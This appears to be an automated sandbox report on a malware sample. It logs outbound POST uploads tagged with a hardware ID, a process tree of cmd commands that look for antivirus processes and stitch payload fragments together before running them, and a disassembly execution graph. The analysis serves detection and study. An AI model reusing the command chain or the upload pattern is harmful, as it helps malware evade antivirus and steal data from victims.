                                              2024-12-24 07:58:55 UTC15331OUTData Raw: 2d 2d 4e 42 34 57 43 39 5a 45 57 4c 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 35 33 37 32 31 41 41 45 43 46 36 43 34 41 32 41 31 36 31 33 34 35 43 44 30 41 37 31 45 37 0d 0a 2d 2d 4e 42 34 57 43 39 5a 45 57 4c 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4e 42 34 57 43 39 5a 45 57 4c 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 6c 33 0d 0a 2d 2d 4e 42 34 57 43 39 5a 45 57 4c 43 0d 0a 43 6f 6e 74 65 6e 74
                                              Data Ascii: --NB4WC9ZEWLCContent-Disposition: form-data; name="hwid"F253721AAECF6C4A2A161345CD0A71E7--NB4WC9ZEWLCContent-Disposition: form-data; name="pid"1--NB4WC9ZEWLCContent-Disposition: form-data; name="lid"jMw1IE--l3--NB4WC9ZEWLCContent
                                              2024-12-24 07:58:55 UTC15331OUTData Raw: cd 59 99 11 c6 d8 c8 99 aa 49 be 0d f3 16 15 b2 f2 f8 58 79 a3 d4 14 3d a9 2b 89 e5 93 71 75 c9 c5 8c ca cf d2 45 23 7c 46 0f c3 0f f5 62 63 c5 1f 14 71 8b f1 60 1c d5 3e c5 fb 65 a8 4a 37 48 e0 dc 91 22 5e 85 88 ac 78 fd 1b 26 84 fe fd d1 b0 9f c4 ac 10 9d 81 6a 9f 5c 17 eb 2b 1a 8e 64 88 10 d5 74 a7 0c 00 c6 f6 44 05 ee 34 89 92 31 6f 64 18 13 61 4f 78 9e 6c ad 4a ef 5b 32 87 63 06 61 b6 90 e0 96 04 a6 0f 0d c7 73 6f 45 6a 7c bc 3e 6e 1b a7 3e ae f4 f2 8b 03 f3 99 83 35 cb 9e 2e 1d b7 7d cb ef f1 1c 1c 94 76 e2 c6 8b 5a 3f f0 5d ab d0 dc 58 fa e3 2e b7 23 01 ca 44 45 b2 c2 48 b0 c0 34 25 5f d3 b5 81 d4 81 bd c8 c8 ee f7 93 dc 69 94 36 bf 61 c1 3d 34 16 bd 5d 1f b6 cf d2 10 0b cf e2 4b 28 c9 2b ec 2b c5 90 a4 d2 d7 57 2d 2f 9a a9 15 7c b1 ee e9 f7 e4 fe
                                              Data Ascii: YIXy=+quE#|Fbcq`>eJ7H"^x&j\+dtD41odaOxlJ[2casoEj|>n>5.}vZ?]X.#DEH4%_i6a=4]K(++W-/|
                                              2024-12-24 07:58:55 UTC15331OUTData Raw: 48 7a fd 28 6b 0f c3 0f 98 6f 1c bb dd cf 7d 02 13 98 f5 6b e6 03 2d 29 05 95 ec e6 89 ce 47 1f c3 2b 44 6f d3 7f f8 8a 46 bd 28 e5 bd ff 11 49 e8 ea 60 bf 70 20 78 f4 76 1a ce 1f c8 5c 5b 78 33 5c dd fb 41 95 d4 70 64 f7 1d 76 67 59 ed 78 62 b5 57 51 d5 fc 7a c8 b0 57 d9 c8 64 38 77 25 b3 aa 6a 61 f3 43 88 df ec d1 32 f2 97 bf 5f 43 8c 77 01 dc 4f 4e 5a 3f cd 02 fe fb 91 59 be d2 a1 af 0e d7 15 70 17 cf b3 06 33 03 77 86 be 88 39 6f 1c 52 90 93 5a da fc 71 7b 8d 3e fa af 9a b0 89 f3 d7 d7 1b 19 a2 63 cb f7 1d aa e7 bf 85 b3 c6 9e 0a d6 74 fc 5e 33 f9 93 c2 b7 1a 4e 47 15 b3 48 7b 6e 24 ed a1 77 f9 ab dc be 3e 2c 6c 65 cc 29 71 a8 ba fb 6e a8 e4 e6 3f 43 ec f5 aa 7a fe 1c 96 72 d8 68 e4 57 0f 03 8b f2 8e c8 07 fb bd 83 82 60 bf c6 c9 67 3b 8c bc 3f ed c3
                                              Data Ascii: Hz(ko}k-)G+DoF(I`p xv\[x3\ApdvgYxbWQzWd8w%jaC2_CwONZ?Yp3w9oRZq{>ct^3NGH{n$w>,le)qn?CzrhW`g;?
                                              2024-12-24 07:58:55 UTC15331OUTData Raw: 4f 3c 9c 36 73 8b 7e d3 82 2f 7d fd fe 71 cd 17 c5 e0 04 f3 e3 42 a5 be 2b a4 49 ed d0 9f 58 ec 76 80 0f ff a5 cd 3f e9 ab 5e df f8 92 1b c7 14 b0 2e 44 b2 2a e6 5e 39 26 8b 89 f7 45 6c 92 74 d3 52 aa 2b 65 3c 1b 7a 03 8a 9a a1 7f 99 13 7f b6 c0 52 9f e5 53 18 6d c6 cf 26 1c 06 98 75 7f 46 d3 3d b7 4e 1f 6e e4 9d ff 8a 8a b4 7e be 43 f2 c5 0c 00 9e 9d 8a 33 98 af 9c ac 7b fe 9b cb fa 6f 22 a7 4f fb 96 52 b2 36 ba 69 97 f5 c6 7b 5a 46 5f 48 fa 9e 0b 83 3f af c6 b3 61 88 5b 32 8a f3 58 75 3b a6 03 ef e2 82 27 5f 5d 30 33 58 91 b5 1d b5 a3 3a 38 5a e2 6c 54 40 32 77 d9 d3 74 ed de 17 ea 4f d6 40 9e 29 7d ee 51 f1 ce dd fd 5f 87 ec b7 03 f4 77 0a 4b c0 70 e2 67 24 89 a6 40 33 e2 07 ba fc 50 34 2f 98 28 cf d6 40 77 f3 30 67 11 40 09 49 c1 5f 93 3a 9e cc 5f 95
                                              Data Ascii: O<6s~/}qB+IXv?^.D*^9&EltR+e<zRSm&uF=Nn~C3{o"OR6i{ZF_H?a[2Xu;'_]03X:8ZlT@2wtO@)}Q_wKpg$@3P4/(@w0g@I_:_
                                              2024-12-24 07:58:55 UTC15331OUTData Raw: 6f 10 12 05 af db b5 0d 35 57 fd 26 7c 55 1d 91 b5 0b d5 81 63 83 43 4c ce e2 71 4d 88 76 86 d7 6e 9a ed 96 18 fe 75 29 49 1d d3 a7 21 0e 5c 9e 4a 9d be 0a a6 58 3b 3c f5 0f b4 75 13 5b cc af 50 d5 2f d4 18 54 1b b5 32 56 22 5a ff b7 75 1d c1 75 d7 32 e3 54 78 84 4a d5 e9 4c 0c c8 2a 47 bc f9 7f 42 f5 ff c9 d9 06 70 9a 99 2d 45 04 cc 61 c0 35 f4 d4 88 bd 24 d4 f4 72 bb eb 17 27 60 01 07 e4 18 12 b2 1b 76 2c 11 20 74 3b 5f 15 0a 52 82 d3 85 57 0c 00 19 11 26 0a 0e 74 dd 01 a6 dd f5 c1 18 b6 1a aa e5 94 bf 51 e1 50 cb 1c fe 9f 49 54 2f fa e8 50 ab 78 01 32 e6 95 04 f9 83 19 84 93 cf a8 0b 31 fa 2e 17 f4 7a 36 df 5d 14 47 94 21 a7 69 b1 ad b8 5e 47 e1 e4 41 c3 94 ea 58 a5 1b a2 53 28 01 0b 22 15 b1 79 78 a9 9d 8e 20 b2 2f fa 58 6f ce 7e dc 0c d7 e5 ee ac 55
                                              Data Ascii: o5W&|UcCLqMvnu)I!\JX;<u[P/T2V"Zuu2TxJL*GBp-Ea5$r'`v, t;_RW&tQPIT/Px21.z6]G!i^GAXS("yx /Xo~U
                                              2024-12-24 07:58:55 UTC15331OUTData Raw: c7 1a 3e fa 25 e9 6a ba d7 2f 78 bc c8 b2 52 a6 07 80 0a 2f 69 64 c1 6f 5a 35 01 75 45 b3 91 0a 31 d8 dc 65 ee 1a 1c 7c 42 cb 12 d2 b4 24 41 50 fe 5c ee 7f eb ec fa ed 9a 79 85 cb e0 8e df 33 3e df 91 71 98 3f d2 ff ce 4c 14 00 80 23 0c 34 12 a1 50 c0 5c 9f 9a 7a 30 92 76 1e ce 0f af c3 9e 50 6e 74 de ee 81 b8 ea fd 87 0d c0 1a 36 4f 81 57 7f 8c dc 1c a2 08 80 57 4b 6d 48 ba 02 8b 9e 12 fa ab f4 80 01 76 2a 40 03 09 f1 22 0e 21 4c a8 f4 7b 4c ee 69 42 4c 64 b5 ef 97 56 81 17 fa de 92 37 5b 46 fe be 61 c7 aa ea 38 e4 28 2c 5c ff 5c ef 56 e9 f5 37 10 79 7c e3 f2 1e 19 a0 7d 73 68 e2 1f cc c6 57 88 51 56 7d 0c c7 10 1c d3 c1 08 41 0b 8d 42 bd 92 3f 65 e9 8d 7b 2e 9d c9 c5 fa 16 16 d4 10 f8 e7 e0 f8 c4 32 1d d1 f0 fa 36 d8 2e 1b 95 87 c8 ea 8b 07 b1 9d 7f 25
                                              Data Ascii: >%j/xR/idoZ5uE1e|B$AP\y3>q?L#4P\z0vPnt6OWWKmHv*@"!L{LiBLdV7[Fa8(,\\V7y|}shWQV}AB?e{.26.%
                                              2024-12-24 07:58:55 UTC15331OUTData Raw: 10 e5 00 74 1f b5 2e 8c f3 13 2b 20 a9 11 74 83 bb 41 91 0f e2 da 0f cc 29 33 42 dd 89 02 83 f8 d4 ba e3 3e 6b fb 5a cc 54 24 37 01 b5 22 f7 a5 6c 37 1b 0e 82 3a b5 98 52 fd 02 de 93 5c bf 3d c5 d8 90 d6 f9 2f 74 41 46 52 31 17 8b 52 b4 e3 41 1c 94 ac af 7d 08 91 d9 05 6c 97 d4 2d 0f 88 61 60 fc d9 70 7b 53 42 a5 d5 73 71 f8 b3 40 1a eb b7 2b eb f7 3f 75 35 cf 22 b8 9b 39 db 93 1c a5 37 ae 35 8a 1c b3 60 96 c2 c2 91 8d 3d d6 6c f3 f8 c5 70 56 5b e2 8e 7a 0c 45 7d 88 41 65 10 c6 1b ff 7e fb e2 d7 0b 1b ba dd 2b 58 f7 99 d7 b8 cb c8 fe 53 ea 46 ab 33 f4 65 d6 3f bb a5 06 a8 aa 0c 1d ec 54 0f 0f a8 59 fe fe d3 f3 e6 a5 10 4b 2b 42 51 dc 66 05 26 6a fe 8d ea e9 fb 27 ee cc 3b f5 79 fa e5 f6 3c 6d 11 08 a0 fb de 54 0a c4 6b 8b cb ae 29 ed 45 e1 a3 57 0b 1f 55
                                              Data Ascii: t.+ tA)3B>kZT$7"l7:R\=/tAFR1RA}l-a`p{SBsq@+?u5"975`=lpV[zE}Ae~+XSF3e?TYK+BQf&j';y<mTk)EWU
                                              2024-12-24 07:58:55 UTC15331OUTData Raw: 61 2f de f2 e7 a0 5d 91 2f 56 4d b4 78 73 88 ec b9 7a f7 d1 b9 21 fe 0c a9 ca 47 19 fe a6 f1 b9 3a 6d 65 ee d0 e4 9c 0e 73 f7 f0 b7 d5 a3 fc 9c 21 93 99 63 f5 37 d9 d5 a4 60 c1 77 db 41 ba 84 3a 74 ac 09 80 a3 3a 60 ba 73 67 45 1c 44 72 8e 79 ed c1 ea 79 33 09 d0 32 a2 42 ab b9 7f 9f f6 40 d4 34 fc 3b 77 9f 4a 6a 81 84 eb d6 17 8f 5c 6b 90 f1 32 bd bf 45 a2 45 ac be 99 29 2e 4e 11 59 39 9e 5d d8 57 d9 f0 bc b0 f8 a7 35 82 29 8d ca f8 dc c0 fa 4f 08 1e 8e 86 4f 88 02 3b f6 07 48 f0 a4 a2 4a 0f 20 41 a7 14 68 36 ed b5 db 9c 24 19 09 51 c9 2d 16 80 f9 ea fe 60 d0 d7 ba 4a 98 22 9d 10 80 80 13 39 2f 9e d4 f8 70 af 62 f8 3e d2 4e 63 c8 a0 db 1b 67 41 ba 26 ee 32 06 12 06 32 3c 0d a0 a5 bf fe 10 cb 70 73 3c 00 0f eb 0f 31 bd 24 1e 57 96 49 02 21 a6 a3 34 9d 89
                                              Data Ascii: a/]/VMxsz!G:mes!c7`wA:t:`sgEDryy32B@4;wJj\k2EE).NY9]W5)OO;HJ Ah6$Q-`J"9/pb>NcgA&22<ps<1$WI!4
                                              2024-12-24 07:58:55 UTC15331OUTData Raw: 3e ef 0d f3 e0 90 00 de b7 65 9b 85 87 6c 69 94 24 b8 be d9 a3 bc 84 7b c5 8a f6 4a c6 d0 d4 11 90 a7 10 17 da e5 b2 f1 7e ee 65 90 d1 ae 54 1b 74 d8 cb 26 dd 31 ee 60 46 aa 7d 66 e4 7e d9 66 5b bd 27 d5 4f 31 fd 4a 2a 70 00 74 f0 af 7f 74 a3 88 d9 aa c3 cc b3 88 bf af 60 92 e7 19 e9 ec 5c 16 de db 07 fa b5 5a 98 84 ac 43 63 b3 73 81 83 73 54 17 a2 f9 01 7d 52 a8 5e c2 a1 0d 41 51 5e 30 cd 21 a6 24 2a bc fe 42 98 1b 15 a5 18 f3 a5 57 df fe 25 7f 8d d2 70 1b c2 0a 0b c5 9c 70 18 aa 7a f9 04 df c2 ab 53 a6 b8 15 19 c9 77 9c 0f eb 95 a1 aa 32 b3 0e 86 19 f1 5b 5b c0 33 c6 8e 9e b7 13 e3 c3 e1 d5 27 7f e8 46 91 3a 58 a8 58 c6 8b 25 2e 16 14 cb 94 0a af 9f b5 a0 aa a2 af 21 28 cd 2b 02 cf 24 b9 aa 41 42 71 eb de ae 4c d0 0b 02 04 b8 ef b4 05 e5 7e 6c 3b ab 69
                                              Data Ascii: >eli${J~eTt&1`F}f~f['O1J*ptt`\ZCcssT}R^AQ^0!$*BW%ppzSw2[[3'F:XX%.!(+$ABqL~l;i
                                              2024-12-24 07:58:55 UTC15331OUTData Raw: c5 d5 58 af 1f 42 b6 24 db 04 2f f5 1a 14 ac c1 c4 94 62 12 6c 6c 48 b3 ce 18 ea f5 d9 2c 40 a9 15 24 6d c2 90 30 47 0b d4 87 ce 0c 57 37 43 54 1c 22 19 c3 73 7d 37 3f d5 f2 75 61 de 77 90 3f d4 bb 38 e0 e7 19 3e d7 bb 5a b5 f7 b4 56 d0 ec 67 b2 df 2c 86 3e 64 ce 89 c9 3a d5 48 a7 fb bd f2 67 73 ef fa b3 79 06 63 b3 ba 14 96 3a f1 3f b5 81 bd c4 2f e8 71 b6 0f c4 a7 89 51 c6 21 56 b7 0d 79 ca 7c fe 43 61 e9 ef 60 f7 71 f1 8f 13 eb 6f 50 c0 6d 78 70 80 7d 1d c8 93 b2 ab 23 67 1a 67 37 1c e9 43 fd e1 ac 76 16 02 05 c2 fd 97 17 ae 6d 44 b8 df 06 7a a5 40 50 10 b8 0f 7b 4e 22 e0 81 9d 2e f0 c0 1f 30 7f 58 e0 16 1e 57 5d ad 75 2c 9c 93 00 91 e5 32 60 85 c0 ef db 39 2b 08 fa 51 ab 31 4b 29 f3 73 0f 3c 1f fb d9 9b 2d df 73 ae bc 51 5c de 64 c5 8c 74 4e fc 70 11
                                              Data Ascii: XB$/bllH,@$m0GW7CT"s}7?uaw?8>ZVg,>d:Hgsyc:?/qQ!Vy|Ca`qoPmxp}#gg7CvmDz@P{N".0XW]u,2`9+Q1K)s<-sQ\dtNp
                                              2024-12-24 07:58:57 UTC1125INHTTP/1.1 200 OK
                                              Date: Tue, 24 Dec 2024 07:58:57 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Set-Cookie: PHPSESSID=7n69qqka41vma784jf4nvvtlm9; expires=Sat, 19 Apr 2025 01:45:36 GMT; Max-Age=9999999; path=/
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate
                                              Pragma: no-cache
                                              X-Frame-Options: DENY
                                              X-Content-Type-Options: nosniff
                                              X-XSS-Protection: 1; mode=block
                                              cf-cache-status: DYNAMIC
                                              vary: accept-encoding
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bzm1Gf4vryel0gsi6jO4I9OWSkEzeiC1ncUB4iqXo9PtJpfhe4UCfeIieMQYJlLHrEZU96yn4UptWjqFo1Tn0ntIr7i5VtIMykZz231q5LYkcBhR5roeM0WMUs%2B3LuiLWw6B"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8f6f0c8b2e4c72ad-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1926&min_rtt=1912&rtt_var=746&sent=348&recv=604&lost=0&retrans=0&sent_bytes=2839&recv_bytes=582194&delivery_rate=1439132&cwnd=236&unsent_bytes=0&cid=1dfd6233932cd88d&ts=2419&x=0"


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:02:57:45
                                              Start date:24/12/2024
                                              Path:C:\Users\user\Desktop\LVDdWBGnVE.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\LVDdWBGnVE.exe"
                                              Imagebase:0x400000
                                              File size:1'294'445 bytes
                                              MD5 hash:5A909C9769920208ED3D4D7279F08DE5
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:2
                                              Start time:02:57:46
                                              Start date:24/12/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\cmd.exe" /c move Campbell Campbell.cmd & Campbell.cmd
                                              Imagebase:0x1c0000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:3
                                              Start time:02:57:46
                                              Start date:24/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff66e660000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:4
                                              Start time:02:57:47
                                              Start date:24/12/2024
                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                              Wow64 process (32bit):true
                                              Commandline:tasklist
                                              Imagebase:0xa70000
                                              File size:79'360 bytes
                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:5
                                              Start time:02:57:47
                                              Start date:24/12/2024
                                              Path:C:\Windows\SysWOW64\findstr.exe
                                              Wow64 process (32bit):true
                                              Commandline:findstr /I "opssvc wrsa"
                                              Imagebase:0x7c0000
                                              File size:29'696 bytes
                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:6
                                              Start time:02:57:48
                                              Start date:24/12/2024
                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                              Wow64 process (32bit):true
                                              Commandline:tasklist
                                              Imagebase:0xa70000
                                              File size:79'360 bytes
                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:7
                                              Start time:02:57:48
                                              Start date:24/12/2024
                                              Path:C:\Windows\SysWOW64\findstr.exe
                                              Wow64 process (32bit):true
                                              Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                              Imagebase:0x7c0000
                                              File size:29'696 bytes
                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:8
                                              Start time:02:57:48
                                              Start date:24/12/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:cmd /c md 370821
                                              Imagebase:0x1c0000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:9
                                              Start time:02:57:48
                                              Start date:24/12/2024
                                              Path:C:\Windows\SysWOW64\findstr.exe
                                              Wow64 process (32bit):true
                                              Commandline:findstr /V "Anchor" Veterinary
                                              Imagebase:0x7c0000
                                              File size:29'696 bytes
                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:10
                                              Start time:02:57:48
                                              Start date:24/12/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:cmd /c copy /b ..\Genre + ..\Mj + ..\Discs + ..\Receiving + ..\Mysterious + ..\Aka w
                                              Imagebase:0x1c0000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:11
                                              Start time:02:57:49
                                              Start date:24/12/2024
                                              Path:C:\Users\user\AppData\Local\Temp\370821\Sale.com
                                              Wow64 process (32bit):true
                                              Commandline:Sale.com w
                                              Imagebase:0x7f0000
                                              File size:947'288 bytes
                                              MD5 hash:62D09F076E6E0240548C2F837536A46A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 0%, ReversingLabs
                                              Has exited:true

                                              General

                                              Target ID:12
                                              Start time:02:57:49
                                              Start date:24/12/2024
                                              Path:C:\Windows\SysWOW64\choice.exe
                                              Wow64 process (32bit):true
                                              Commandline:choice /d y /t 5
                                              Imagebase:0xcb0000
                                              File size:28'160 bytes
                                              MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:17.8%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:21%
                                                Total number of Nodes:1482
                                                Total number of Limit Nodes:26
                                                execution_graph 4186 402fc0 4187 401446 18 API calls 4186->4187 4188 402fc7 4187->4188 4189 401a13 4188->4189 4190 403017 4188->4190 4191 40300a 4188->4191 4193 406831 18 API calls 4190->4193 4192 401446 18 API calls 4191->4192 4192->4189 4193->4189 4194 4023c1 4195 40145c 18 API calls 4194->4195 4196 4023c8 4195->4196 4199 407296 4196->4199 4202 406efe CreateFileW 4199->4202 4203 406f30 4202->4203 4204 406f4a ReadFile 4202->4204 4205 4062cf 11 API calls 4203->4205 4206 4023d6 4204->4206 4209 406fb0 4204->4209 4205->4206 4207 406fc7 ReadFile lstrcpynA lstrcmpA 4207->4209 4210 40700e SetFilePointer ReadFile 4207->4210 4208 40720f CloseHandle 4208->4206 4209->4206 4209->4207 4209->4208 4211 407009 4209->4211 4210->4208 4212 4070d4 ReadFile 4210->4212 4211->4208 4213 407164 4212->4213 4213->4211 4213->4212 4214 40718b SetFilePointer GlobalAlloc ReadFile 4213->4214 4215 4071eb lstrcpynW GlobalFree 4214->4215 4216 4071cf 4214->4216 4215->4208 4216->4215 4216->4216 4217 401cc3 4218 40145c 18 API calls 4217->4218 4219 401cca lstrlenW 4218->4219 4220 4030dc 4219->4220 4221 4030e3 4220->4221 4223 405f7d wsprintfW 4220->4223 4223->4221 4224 401c46 4225 40145c 18 API calls 4224->4225 4226 401c4c 4225->4226 4227 4062cf 11 API calls 4226->4227 4228 401c59 4227->4228 4229 406cc7 81 API calls 4228->4229 4230 401c64 4229->4230 4231 403049 4232 401446 18 API calls 4231->4232 4233 403050 4232->4233 4234 406831 18 API calls 4233->4234 4235 401a13 4233->4235 4234->4235 4236 40204a 4237 401446 18 API calls 4236->4237 4238 402051 IsWindow 4237->4238 4239 4018d3 4238->4239 4240 40324c 4241 403277 4240->4241 4242 40325e SetTimer 4240->4242 4243 4032cc 4241->4243 4244 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4241->4244 4242->4241 4244->4243 4245 4022cc 4246 40145c 18 API calls 4245->4246 4247 4022d3 4246->4247 4248 406301 2 API calls 4247->4248 4249 4022d9 4248->4249 4251 4022e8 4249->4251 4254 405f7d wsprintfW 4249->4254 4252 4030e3 4251->4252 4255 405f7d wsprintfW 4251->4255 4254->4251 4255->4252 4256 4030cf 4257 40145c 18 API calls 4256->4257 4258 4030d6 4257->4258 4260 4030dc 4258->4260 4263 4063d8 GlobalAlloc lstrlenW 4258->4263 4261 4030e3 4260->4261 4290 405f7d wsprintfW 4260->4290 4264 406460 4263->4264 4265 40640e 4263->4265 4264->4260 4266 40643b GetVersionExW 4265->4266 4291 406057 CharUpperW 4265->4291 4266->4264 4267 40646a 4266->4267 4268 406490 LoadLibraryA 4267->4268 4269 406479 4267->4269 4268->4264 4272 4064ae GetProcAddress GetProcAddress GetProcAddress 4268->4272 4269->4264 4271 4065b1 GlobalFree 4269->4271 4273 4065c7 LoadLibraryA 4271->4273 4274 406709 FreeLibrary 4271->4274 4275 406621 4272->4275 4279 4064d6 4272->4279 4273->4264 4277 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4273->4277 4274->4264 4276 40667d FreeLibrary 4275->4276 4278 406656 4275->4278 4276->4278 4277->4275 4282 406716 4278->4282 4287 4066b1 lstrcmpW 4278->4287 4288 4066e2 CloseHandle 4278->4288 4289 406700 CloseHandle 4278->4289 4279->4275 4280 406516 4279->4280 4281 4064fa FreeLibrary GlobalFree 4279->4281 4280->4271 4283 406528 lstrcpyW OpenProcess 4280->4283 4285 40657b CloseHandle CharUpperW lstrcmpW 4280->4285 4281->4264 4284 40671b CloseHandle FreeLibrary 4282->4284 4283->4280 4283->4285 4286 406730 CloseHandle 4284->4286 4285->4275 4285->4280 4286->4284 4287->4278 4287->4286 4288->4278 4289->4274 4290->4261 4291->4265 4292 4044d1 4293 40450b 4292->4293 4294 40453e 4292->4294 4360 405cb0 GetDlgItemTextW 4293->4360 4295 40454b GetDlgItem GetAsyncKeyState 4294->4295 4299 4045dd 4294->4299 4297 40456a GetDlgItem 4295->4297 4310 404588 4295->4310 4302 403d6b 19 API calls 4297->4302 4298 4046c9 4358 40485f 4298->4358 4362 405cb0 GetDlgItemTextW 4298->4362 4299->4298 4307 406831 18 API calls 4299->4307 4299->4358 4300 404516 4301 406064 5 API calls 4300->4301 4303 40451c 4301->4303 4305 40457d ShowWindow 4302->4305 4306 403ea0 5 API calls 4303->4306 4305->4310 4311 404521 GetDlgItem 4306->4311 4312 40465b SHBrowseForFolderW 4307->4312 4308 4046f5 4313 4067aa 18 API calls 4308->4313 4309 403df6 8 API calls 4314 404873 4309->4314 4315 4045a5 SetWindowTextW 4310->4315 4319 405d85 4 API calls 4310->4319 4316 40452f IsDlgButtonChecked 4311->4316 4311->4358 4312->4298 4318 404673 CoTaskMemFree 4312->4318 4323 4046fb 4313->4323 4317 403d6b 19 API calls 4315->4317 4316->4294 4321 4045c3 4317->4321 4322 40674e 3 API calls 4318->4322 4320 40459b 4319->4320 4320->4315 4327 40674e 3 API calls 4320->4327 4324 403d6b 19 API calls 4321->4324 4325 404680 4322->4325 4363 406035 lstrcpynW 4323->4363 4328 4045ce 4324->4328 4329 4046b7 SetDlgItemTextW 4325->4329 4334 406831 18 API calls 4325->4334 4327->4315 4361 403dc4 SendMessageW 4328->4361 4329->4298 4330 404712 4332 406328 3 API calls 4330->4332 4341 40471a 4332->4341 4333 4045d6 4335 406328 3 API calls 4333->4335 4336 40469f lstrcmpiW 4334->4336 4335->4299 4336->4329 4339 4046b0 lstrcatW 4336->4339 4337 40475c 4364 406035 lstrcpynW 4337->4364 4339->4329 4340 404765 4342 405d85 4 API calls 4340->4342 4341->4337 4345 40677d 2 API calls 4341->4345 4347 4047b1 4341->4347 4343 40476b GetDiskFreeSpaceW 4342->4343 4346 40478f MulDiv 4343->4346 4343->4347 4345->4341 4346->4347 4348 40480e 4347->4348 4365 4043d9 4347->4365 4349 404831 4348->4349 4351 40141d 80 API calls 4348->4351 4373 403db1 KiUserCallbackDispatcher 4349->4373 4351->4349 4352 4047ff 4354 404810 SetDlgItemTextW 4352->4354 4355 404804 4352->4355 4354->4348 4357 4043d9 21 API calls 4355->4357 4356 40484d 4356->4358 4374 403d8d 4356->4374 4357->4348 4358->4309 4360->4300 4361->4333 4362->4308 4363->4330 4364->4340 4366 4043f9 4365->4366 4367 406831 18 API calls 4366->4367 4368 404439 4367->4368 4369 406831 18 API calls 4368->4369 4370 404444 4369->4370 4371 406831 18 API calls 4370->4371 4372 404454 lstrlenW wsprintfW SetDlgItemTextW 4371->4372 4372->4352 4373->4356 4375 403da0 SendMessageW 4374->4375 4376 403d9b 4374->4376 4375->4358 4376->4375 4377 401dd3 4378 401446 18 API calls 4377->4378 4379 401dda 4378->4379 4380 401446 18 API calls 